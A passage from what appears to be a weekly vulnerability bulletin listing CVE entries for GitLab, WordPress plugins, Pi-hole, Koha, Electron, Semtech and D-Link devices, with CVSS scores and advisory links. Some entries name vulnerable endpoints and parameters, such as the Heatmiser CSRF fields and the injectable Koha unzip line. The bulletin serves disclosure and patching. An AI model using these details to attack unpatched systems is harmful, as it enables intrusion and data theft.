| Heatmiser--Heatmiser Wifi Thermostat | Heatmiser Wifi Thermostat 1.7 contains a cross-site request forgery vulnerability that allows attackers to change administrator credentials by tricking authenticated users into submitting malicious requests. Attackers can craft HTML forms targeting the networkSetup.htm endpoint with parameters usnm, usps, and cfps to modify the admin username and password without user consent. | 2026-04-12 | 4.3 | CVE-2019-25708 | ExploitDB-46100 VulnCheck Advisory: Heatmiser Wifi Thermostat 1.7 Cross-Site Request Forgery |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 16.6 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that under certain circumstances could have allowed an authenticated user to have access to other users' email addresses via certain GraphQL queries. | 2026-04-08 | 4.3 | CVE-2025-9484 | GitLab Issue #565363 HackerOne Bug Bounty Report #3303810 https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/ |
| vsourz1td--Advanced Contact form 7 DB | The Advanced Contact form 7 DB plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'vsz_cf7_export_to_excel' function in all versions up to, and including, 2.0.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to export form submissions to an Excel file. | 2026-04-08 | 4.3 | CVE-2026-0814 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5e3de1a4-a534-475b-9138-2337755b0288?source=cve https://plugins.trac.wordpress.org/browser/advanced-cf7-db/tags/2.0.9/admin/class-advanced-cf7-db-admin.php#L1507 https://plugins.trac.wordpress.org/changeset/3497481/advanced-cf7-db |
| realmag777--BEAR Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net | The BEAR - Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.5. This is due to missing nonce validation on the woobe_delete_tax_term() function. This makes it possible for unauthenticated attackers to delete WooCommerce taxonomy terms (categories, tags, etc.) via a forged request granted they can trick a site administrator or shop manager into performing an action such as clicking on a link. | 2026-04-08 | 4.3 | CVE-2026-1673 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1e4e8960-b0c1-4dbb-ba97-e45b88fb06c0?source=cve https://plugins.trac.wordpress.org/browser/woo-bulk-editor/trunk/index.php#L1474 https://plugins.trac.wordpress.org/changeset/3457263/ https://plugins.trac.wordpress.org/changeset/3465138/ |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 11.3 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an authenticated user with developer-role permissions to modify protected environment settings due to improper authorization checks in the API. | 2026-04-08 | 4.3 | CVE-2026-1752 | HackerOne Bug Bounty Report #3533545 https://gitlab.com/gitlab-org/gitlab/-/work_items/588413 https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/ |
| arubadev--Aruba HiSpeed Cache | The Aruba HiSpeed Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.0.4. This is due to missing nonce verification on the `ahsc_ajax_reset_options()` function. This makes it possible for unauthenticated attackers to reset all plugin settings to their default values via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-04-10 | 4.3 | CVE-2026-1924 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d2230151-fde2-43d6-8bff-0d2ffd559ab3?source=cve https://plugins.trac.wordpress.org/browser/aruba-hispeed-cache/tags/3.0.4/aruba-hispeed-cache.php#L632 https://plugins.trac.wordpress.org/browser/aruba-hispeed-cache/tags/3.0.4/aruba-hispeed-cache.php#L631 https://plugins.trac.wordpress.org/changeset?old_path=%2Faruba-hispeed-cache/tags/3.0.4&new_path=%2Faruba-hispeed-cache/tags/3.0.5 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.2 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an authenticated user to access confidential issues assigned to other users via CSV export due to insufficient authorization checks. | 2026-04-08 | 4.3 | CVE-2026-2104 | HackerOne Bug Bounty Report #3541476 https://gitlab.com/gitlab-org/gitlab/-/work_items/589021 https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/ |
| idealwebdesignlk--Whole Enquiry Cart for WooCommerce | The Whole Enquiry Cart for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'woowhole_success_msg' parameter in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-04-08 | 4.4 | CVE-2026-2838 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ddc14a98-1df8-480b-bae3-5ec057b498af?source=cve https://plugins.trac.wordpress.org/browser/whole-cart-enquiry/trunk/admin.php#L53 |
| homarr-labs--homarr | Homarr is an open-source dashboard. Prior to 1.57.0, the user registration endpoint (/api/trpc/user.register) is vulnerable to a race condition that allows an attacker to create multiple user accounts from a single-use invite token. The registration flow performs three sequential database operations without a transaction: CHECK, CREATE, and DELETE. Because these operations are not atomic, concurrent requests can all pass the validation step (1) before any of them reaches the deletion step (3). This allows multiple accounts to be registered using a single invite token that was intended to be single-use. This vulnerability is fixed in 1.57.0. | 2026-04-06 | 4.2 | CVE-2026-32602 | https://github.com/homarr-labs/homarr/security/advisories/GHSA-vfw3-53q9-2hp8 |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an Open Redirect vulnerability in the session course edit page allows an attacker to redirect an authenticated administrator to an arbitrary external URL after saving coach assignment changes. The redirect also leaks the id_session parameter to the attacker's server. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. | 2026-04-10 | 4.7 | CVE-2026-32932 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-q2cp-3qj3-wx8q https://github.com/chamilo/chamilo-lms/commit/b005b3d3e76cf6eafc03e15ac445ceff089551c0 https://github.com/chamilo/chamilo-lms/commit/fbd8d7eb37d05ec974293f05b6ffaaf9102ebd2b |
| Microsoft--Microsoft Edge (Chromium-based) | Microsoft Edge (Chromium-based) Spoofing Vulnerability | 2026-04-10 | 4.3 | CVE-2026-33118 | Microsoft Edge (Chromium-based) Spoofing Vulnerability |
| Elastic--Kibana | Incorrect Authorization (CWE-863) in Kibana can lead to cross-space information disclosure via Privilege Abuse (CAPEC-122). A user with Fleet agent management privileges in one Kibana space can retrieve Fleet Server policy details from other spaces through an internal enrollment endpoint. The endpoint bypasses space-scoped access controls by using an unscoped internal client, returning operational identifiers, policy names, management state, and infrastructure linkage details from spaces the user is not authorized to access. | 2026-04-08 | 4.3 | CVE-2026-33460 | https://discuss.elastic.co/t/kibana-8-19-14-9-2-8-9-3-3-security-update-esa-2026-25/385813 |
| themeum--Tutor LMS eLearning and online course solution | The Tutor LMS - eLearning and online course solution plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.9.7. This is due to missing authorization checks in the `save_course_content_order()` private method, which is called unconditionally by the `tutor_update_course_content_order` AJAX handler. While the handler's `content_parent` branch includes a `can_user_manage()` check, the `save_course_content_order()` call processes attacker-supplied `tutor_topics_lessons_sorting` JSON without any ownership or capability verification. This makes it possible for authenticated attackers with Subscriber-level access or above to detach lessons from topics, reorder course content, and reassign lessons between topics in any course, including admin-owned courses, by sending a crafted AJAX request with manipulated topic and lesson IDs. | 2026-04-11 | 4.3 | CVE-2026-3371 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f9cf0430-8577-449a-aefe-d7bf606fe2de?source=cve https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L1687 https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L1755 https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L252 https://plugins.trac.wordpress.org/changeset?old_path=%2Ftutor/tags/3.9.7&new_path=%2Ftutor/tags/3.9.8 |
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Mattermost--Mattermost | Mattermost Plugins versions <=2.3.1 fail to limit the request body size on the /lifecycle webhook endpoint which allows an authenticated attacker to cause memory exhaustion and denial of service via sending an oversized JSON payload. Mattermost Advisory ID: MMSA-2026-00610 | 2026-04-09 | 3.7 | CVE-2026-21388 | MMSA-2026-00610 |
| Dell--PowerProtect Agent | Dell PowerProtect Agent Service, version(s) prior to 20.1, contain(s) an Incorrect Permission Assignment for Critical Resource vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Information exposure. | 2026-04-08 | 3.3 | CVE-2026-28264 | https://www.dell.com/support/kbdoc/en-us/000447277/dsa-2026-158-security-update-dell-powerprotect-data-manager-for-multiple-security-vulnerabilities |
| pi-hole--web | Pi-hole Admin Interface is a web interface for managing Pi-hole, a network-level ad and internet tracker blocking application. From 6.0 to before 6.5, client hostnames and IP addresses from the FTL database are rendered into the DOM without escaping in network.js (Network page) and charts.js/index.js (Dashboard chart tooltips). While upstream validation in dnsmasq and FTL blocks HTML characters via normal DHCP/DNS paths, the web UI performs no output escaping - an inconsistency with other fields in the same file that are properly escaped. This vulnerability is fixed in 6.5. | 2026-04-06 | 3.4 | CVE-2026-33404 | https://github.com/pi-hole/web/security/advisories/GHSA-px6w-85wp-ww9v |
| pi-hole--web | Pi-hole Admin Interface is a web interface for managing Pi-hole, a network-level ad and internet tracker blocking application. From 6.0 to before 6.5, the formatInfo() function in queries.js renders data.upstream, data.client.ip, and data.ede.text into HTML without escaping when a user expands a query row in the Query Log, enabling stored HTML injection. JavaScript execution is blocked by the server's CSP (script-src 'self'). The same fields are properly escaped in the table view (rowCallback), confirming the omission was an oversight. This vulnerability is fixed in 6.5. | 2026-04-06 | 3.1 | CVE-2026-33405 | https://github.com/pi-hole/web/security/advisories/GHSA-jx8x-mj2r-62vq |
| OpenStack--Keystone | An issue was discovered in OpenStack Keystone 14 through 26 before 26.1.1, 27.0.0, 28.0.0, and 29.0.0. Restricted application credentials can create EC2 credentials. By using a restricted application credential to call the EC2 credential creation API, an authenticated user with only a reader role may obtain an EC2/S3 credential that carries the full set of the parent user's S3 permissions, effectively bypassing the role restrictions imposed on the application credential. Only deployments that use restricted application credentials in combination with the EC2/S3 compatibility API (swift3 / s3api) are affected. | 2026-04-10 | 3.5 | CVE-2026-33551 | https://bugs.launchpad.net/keystone/+bug/2142138 https://security.openstack.org/ossa/OSSA-2026-005.html |
| harttle--liquidjs | LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. Prior to 10.25.3, the replace filter in LiquidJS incorrectly accounts for memory usage when the memoryLimit option is enabled. It charges str.length + pattern.length + replacement.length bytes to the memory limiter, but the actual output from str.split(pattern).join(replacement) can be quadratically larger when the pattern occurs many times in the input string. This allows an attacker who controls template content to bypass the memoryLimit DoS protection with approximately 2,500x amplification, potentially causing out-of-memory conditions. This vulnerability is fixed in 10.25.3. | 2026-04-08 | 3.7 | CVE-2026-34166 | https://github.com/harttle/liquidjs/security/advisories/GHSA-mmg9-6m6j-jqqx https://github.com/harttle/liquidjs/commit/abc058be0f33d6372cd2216f4945183167abeb25 https://github.com/harttle/liquidjs/releases/tag/v10.25.3 |
| electron--electron | Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. From 33.0.0-alpha.1 to before 39.8.5, 40.8.5, 41.1.0, and 42.0.0-alpha.5, apps that use offscreen rendering with GPU shared textures may be vulnerable to a use-after-free. Under certain conditions, the release() callback provided on a paint event texture can outlive its backing native state, and invoking it after that point dereferences freed memory in the main process, which may lead to a crash or memory corruption. Apps are only affected if they use offscreen rendering with webPreferences.offscreen: { useSharedTexture: true }. Apps that do not enable shared-texture offscreen rendering are not affected. To mitigate this issue, ensure texture.release() is called promptly after the texture has been consumed, before the texture object becomes unreachable. This vulnerability is fixed in 39.8.5, 40.8.5, 41.1.0, and 42.0.0-alpha.5. | 2026-04-06 | 2.3 | CVE-2026-34764 | https://github.com/electron/electron/security/advisories/GHSA-8x5q-pvf5-64mp |
| electron--electron | Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.5, 40.8.5, 41.1.0, and 42.0.0-alpha.5, apps that call clipboard.readImage() may be vulnerable to a denial of service. If the system clipboard contains image data that fails to decode, the resulting null bitmap is passed unchecked to image construction, triggering a controlled abort and crashing the process. Apps are only affected if they call clipboard.readImage(). Apps that do not read images from the clipboard are not affected. This issue does not allow memory corruption or code execution. This vulnerability is fixed in 39.8.5, 40.8.5, 41.1.0, and 42.0.0-alpha.5. | 2026-04-07 | 2.8 | CVE-2026-34781 | https://github.com/electron/electron/security/advisories/GHSA-f37v-82c4-4x64 |
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. From 1.11.0 to 2.0-beta.1, anyone can trigger a malicious redirect through the use of the redirect parameter to /login. This vulnerability is fixed in 2.0-beta.2. | 2026-04-10 | not yet calculated | CVE-2025-66447 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-m82x-prv3-rwwv https://github.com/chamilo/chamilo-lms/commit/73ae6293adaa6098374bc22625342dbae5cbc446 |
| n/a--Stakeholder-Specific Vulnerability Categorization (SSVC) | QD 20230821 is vulnerable to Server-side request forgery (SSRF) via a crafted request | 2026-04-08 | not yet calculated | CVE-2023-46945 | https://qd-today.github.io/qd/ https://gist.github.com/kurokoleung/5b36b2013a54adadcce79967d3e4f056 |
| n/a--Koha 23.05.10 | Koha Library before 23.05.10 fails to sanitize user-controllable filenames prior to unzipping, leading to remote code execution. The line "qx/unzip $filename -d $dirname/;" in upload-cover-image.pl is vulnerable to command injection via shell metacharacters because input data can be controlled by an attacker and is directly included in a system command, i.e., an attack can occur via malicious filenames after uploading a .zip file and clicking Process Images. | 2026-04-07 | not yet calculated | CVE-2024-36057 | https://gitlab.com/koha-community/Koha/-/blob/23.05.x/misc/release_notes/release_notes_23_05_10.md https://gitlab.com/koha-community/Koha/-/blob/23.05.x/misc/release_notes/release_notes_23_05_11.md https://github.com/hacklantic/Research/tree/main/CVE-2024-36057 https://koha-community.org/koha-22-05-22-released/ |
| n/a--Koha 23.05.10 | The Send Basket functionality in Koha Library before 23.05.10 is susceptible to Time-Based SQL Injection because it fails to sanitize the POST parameter bib_list in /cgi-bin/koha/opac-sendbasket.pl, allowing library users to read arbitrary data from the database. | 2026-04-07 | not yet calculated | CVE-2024-36058 | https://gitlab.com/koha-community/Koha/-/blob/23.05.x/misc/release_notes/release_notes_23_05_10.md https://gitlab.com/koha-community/Koha/-/blob/23.05.x/misc/release_notes/release_notes_23_05_11.md https://koha-community.org/koha-22-05-22-released/ https://github.com/hacklantic/Research/tree/main/CVE-2024-36058 |
| Unknown--YML for Yandex Market | The YML for Yandex Market WordPress plugin before 5.0.26 is vulnerable to Remote Code Execution via the feed generation process. | 2026-04-10 | not yet calculated | CVE-2025-14545 | https://wpscan.com/vulnerability/9bb1a4ca-976c-461d-82de-8a3b04a56fbc/ |
| Canonical--Ubuntu | In Ubuntu, Subiquity version 24.04.4 could leak sensitive user credentials during crash reporting. Upon installation failure, if a user submitted a bug report to Launchpad, Subiquity could include certain user credentials, such as the user's plaintext Wi-Fi password, in the attached logs. | 2026-04-09 | not yet calculated | CVE-2025-14551 | noble backport - stop logging network config and identity data Stop logging identity data and network secrets |
| Mitsubishi Electric Corporation--GENESIS64 | Cleartext Storage of Sensitive Information vulnerability in Mitsubishi Electric GENESIS64 versions 10.97.3 and prior, Mitsubishi Electric ICONICS Suite versions 10.97.3 and prior, Mitsubishi Electric MobileHMI versions 10.97.3 and prior, Mitsubishi Electric Hyper Historian versions 10.97.3 and prior, Mitsubishi Electric AnalytiX versions 10.97.3 and prior, Mitsubishi Electric GENESIS versions 11.02 and prior, Mitsubishi Electric MC Works64 all versions, Mitsubishi Electric Iconics Digital Solutions GENESIS64 versions 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solutions ICONICS Suite versions 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solutions MobileHMI versions 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solutions Hyper Historian versions 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solutions AnalytiX versions 10.97.3 and prior, and Mitsubishi Electric Iconics Digital Solutions GENESIS versions 11.02 and prior allows a local attacker to disclose the SQL Server credentials stored in plaintext within the local SQLite file by exploiting this vulnerability, when the local caching feature using SQLite is enabled and SQL authentication is used for the SQL Server authentication. As a result, the unauthorized attacker could access the SQL Server and disclose, tamper with, or destroy data on the server, potentially causing a denial-of-service (DoS) condition on the system. | 2026-04-08 | not yet calculated | CVE-2025-14815 | https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-023_en.pdf https://jvn.jp/vu/JVNVU90646130/ https://www.cisa.gov/news-events/ics-advisories/icsa-26-097-01 |
| Mitsubishi Electric Corporation--GENESIS64 | Cleartext Storage of Sensitive Information in GUI vulnerability in Mitsubishi Electric GENESIS64 versions 10.97.3 and prior, Mitsubishi Electric ICONICS Suite versions 10.97.3 and prior, Mitsubishi Electric MobileHMI versions 10.97.3 and prior, Mitsubishi Electric Hyper Historian versions 10.97.3 and prior, Mitsubishi Electric AnalytiX versions 10.97.3 and prior, Mitsubishi Electric GENESIS versions 11.02 and prior, Mitsubishi Electric MC Works64 all versions, Mitsubishi Electric Iconics Digital Solutions GENESIS64 versions 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solutions ICONICS Suite versions 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solutions MobileHMI versions 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solutions Hyper Historian versions 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solutions AnalytiX versions 10.97.3 and prior, and Mitsubishi Electric Iconics Digital Solutions GENESIS versions 11.02 and prior allows a local attacker to disclose the SQL Server credentials displayed in plain text in the GUI of the Hyper Historian Splitter feature by exploiting this vulnerability, when SQL authentication is used for the SQL Server authentication. As a result, the unauthorized attacker could access the SQL Server and disclose, tamper with, or destroy data on the server, potentially causing a denial-of-service (DoS) condition on the system. | 2026-04-08 | not yet calculated | CVE-2025-14816 | https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-023_en.pdf https://www.cisa.gov/news-events/ics-advisories/icsa-26-097-01 https://jvn.jp/vu/JVNVU90646130/ |
| Semtech--LR1110 | An improper access control vulnerability exists in Semtech LoRa LR11xxx transceivers running early versions of firmware where the memory write command accessible via the physical SPI interface fails to enforce write protection on the program call stack. An attacker with physical access to the SPI interface can overwrite stack memory to hijack program control flow and achieve limited arbitrary code execution. However, the impact is limited to the active attack session: the device's secure boot mechanism prevents persistent firmware modification, the crypto engine isolates cryptographic keys from direct firmware access, and all modifications are lost upon device reboot or loss of physical access. | 2026-04-07 | not yet calculated | CVE-2025-14857 | https://www.semtech.com/company/security/security-bulletins/sem-psa-2026-001 |
| Semtech--LR1110 | The Semtech LR11xx LoRa transceivers running early versions of firmware contain an information disclosure vulnerability in their firmware validation functionality. When a host issues a firmware validity check command via the SPI interface, the device decrypts the provided encrypted firmware package block-by-block to validate its integrity. However, the last decrypted firmware block remains uncleared in memory after the validation process completes. An attacker with access to the SPI interface can subsequently issue memory read commands to retrieve the decrypted firmware contents from this residual memory, effectively bypassing the firmware encryption protection mechanism. The attack requires physical access to the device's SPI interface. | 2026-04-07 | not yet calculated | CVE-2025-14858 | https://www.semtech.com/company/security/security-bulletins/sem-psa-2026-001 |
| Semtech--LR1110 | The Semtech LR11xx LoRa transceivers implement secure boot functionality using digital signatures to authenticate firmware. However, the implementation uses a non-standard cryptographic hashing algorithm that is vulnerable to second preimage attacks. An attacker with physical access to the device can exploit this weakness to generate a malicious firmware image with a hash collision, bypassing the secure boot verification mechanism and installing arbitrary unauthorized firmware on the device. | 2026-04-07 | not yet calculated | CVE-2025-14859 | https://www.semtech.com/company/security/security-bulletins/sem-psa-2026-001 |
| Canonical--Ubuntu | In Ubuntu, ubuntu-desktop-provision version 24.04.4 could leak sensitive user credentials during crash reporting. Upon installation failure, if a user submitted a bug report to Launchpad, ubuntu-desktop-provision could include the user's password hash in the attached logs. | 2026-04-09 | not yet calculated | CVE-2025-15480 | feat: don't log identity data (noble backport) feat: don't log identity data |
| Unknown--Popup Box | The Popup Box WordPress plugin before 5.5.0 does not properly validate nonces in the add_or_edit_popupbox() function before saving popup data, allowing unauthenticated attackers to perform Cross-Site Request Forgery attacks. When an authenticated admin visits a malicious page, the attacker can create or modify popups with arbitrary JavaScript that executes in the admin panel and frontend. | 2026-04-07 | not yet calculated | CVE-2025-15611 | https://wpscan.com/vulnerability/089ea763-2421-4089-a220-251421f7f226/ |
| Ping Identity--PingIDM | An insufficient granularity of access control vulnerability exists in PingIDM (formerly ForgeRock Identity Management) where administrators cannot properly configure access rules for Remote Connector Servers (RCS) running in client mode. This means attackers can spoof a client-mode RCS (if one exists) to intercept and/or modify an identity's security-relevant properties, such as passwords and account recovery information. This issue is exploitable only when an RCS is configured to run in client mode. | 2026-04-07 | not yet calculated | CVE-2025-20628 | https://backstage.forgerock.com/knowledge/advisories/article/a14305629?rev=_newest https://backstage.pingidentity.com/downloads/browse/idm/featured |
| Nokia--MantaRay NM | Nokia MantaRay NM is vulnerable to an OS command injection vulnerability due to improper neutralization of special elements used in an OS command in Symptom Collector application. | 2026-04-07 | not yet calculated | CVE-2025-24817 | https://www.nokia.com/we-are-nokia/security/product-security-advisory/cve-2025-24817/ |
| Nokia--MantaRay NM | Nokia MantaRay NM is vulnerable to an OS command injection vulnerability due to improper neutralization of special elements used in an OS command in Log Search application. | 2026-04-07 | not yet calculated | CVE-2025-24818 | https://www.nokia.com/we-are-nokia/security/product-security-advisory/cve-2025-24818/ |
| Nokia--MantaRay NM | Nokia MantaRay NM is vulnerable to a Relative Path Traversal vulnerability due to improper validation of input parameter on the file system in Software Manager application. | 2026-04-07 | not yet calculated | CVE-2025-24819 | https://www.nokia.com/we-are-nokia/security/product-security-advisory/cve-2025-24819/ |
| Checkmk GmbH--Checkmk | Local privilege escalation in Checkmk 2.2.0 (EOL), Checkmk 2.3.0 before 2.3.0p46, Checkmk 2.4.0 before 2.4.0p25, and Checkmk 2.5.0 (beta) before 2.5.0b3 allows a site user to escalate their privileges to root, by manipulating files in the site context that are processed when the `omd` administrative command is run by root. | 2026-04-07 | not yet calculated | CVE-2025-39666 | https://checkmk.com/werk/18891 |
| n/a--OwnTone - open source (audio) media server | owntone-server 2ca10d9 is vulnerable to Buffer Overflow due to lack of recursive checking. | 2026-04-10 | not yet calculated | CVE-2025-44560 | https://github.com/owntone/owntone-server/issues/1873 https://gist.github.com/wenwenyuyu/517851c3fe38c4f97b2d1940597da2d3 |
| D-Link[.]com -- D-Link DI-8300 | D-Link DI-8300 v16.07.26A1 was discovered to contain a buffer overflow via the ip parameter in the ip_position_asp function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-04-08 | not yet calculated | CVE-2025-45057 | https://www.dlink.com/en/security-bulletin/ https://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=DI-8300 https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8300 | D-Link DI-8300 v16.07.26A1 was discovered to contain a buffer overflow via the fx parameter in the jingx_asp function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-04-08 | not yet calculated | CVE-2025-45058 | https://www.dlink.com/en/security-bulletin/ https://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=DI-8300 https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8300 | D-Link DI-8300 v16.07.26A1 was discovered to contain a buffer overflow via the fn parameter in the tgfile_htm function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-04-08 | not yet calculated | CVE-2025-45059 | https://www.dlink.com/en/security-bulletin/ https://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=DI-8300 https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| www[.]rrweb[.]io/ -- rrwebplayer | A cross-site scripting (XSS) vulnerability in rrweb-snapshot before v2.0.0-alpha.18 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. | 2026-04-09 | not yet calculated | CVE-2025-45806 | https://github.com/rrweb-io/rrweb https://github.com/rrweb-io/rrweb/tree/master/packages/rrweb-snapshot https://github.com/rrweb-io/rrweb/issues/1817 |
| Google--Android | In importWrappedKey of KMKeymasterApplet.java, there is a possible way to access keys that should be restricted due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-04-06 | not yet calculated | CVE-2025-48651 | https://source.android.com/docs/security/bulletin/2026/2026-04-01 |
| n/a--n/a | Jizhicms v2.5.4 is vulnerable to Server-Side Request Forgery (SSRF) in User Evaluation, Message, and Comment modules. | 2026-04-09 | not yet calculated | CVE-2025-50228 | https://github.com/Cherry-toto/jizhicms https://www.jizhicms.cn https://github.com/Cherry-toto/jizhicms/issues/104 |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper validation of user input in the qj.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50644 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A vulnerability has been discovered in D-Link DI-8003 16.07.26A1, which can lead to a buffer overflow when the s parameter in the pppoe_list_opt.asp endpoint is manipulated. By sending a crafted request with an excessively large value for the s parameter, an attacker can trigger a buffer overflow condition. | 2026-04-08 | not yet calculated | CVE-2025-50645 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to insufficient input validation on the name parameter in the /qos_type_asp.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50646 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1, specifically in the handling of the wans parameter in the qos.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50647 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to inadequate input validation in the /tggl.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50648 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper input validation in the vlan_name parameter in the /shut_set.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50649 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to inadequate validation of input size in the routes_static parameter in the /router.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50650 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | An issue exists in D-Link DI-8003 16.07.26A1 related to improper handling of the id parameter in the /saveparm_usb.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50652 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the name and mem parameters in the /time_group.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50653 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper validation of the id parameter in the /thd_member.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50654 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the name parameter in the /thd_group.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50655 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the pid parameter in the /trace.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50657 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the custom_error parameter in the /user.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50659 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
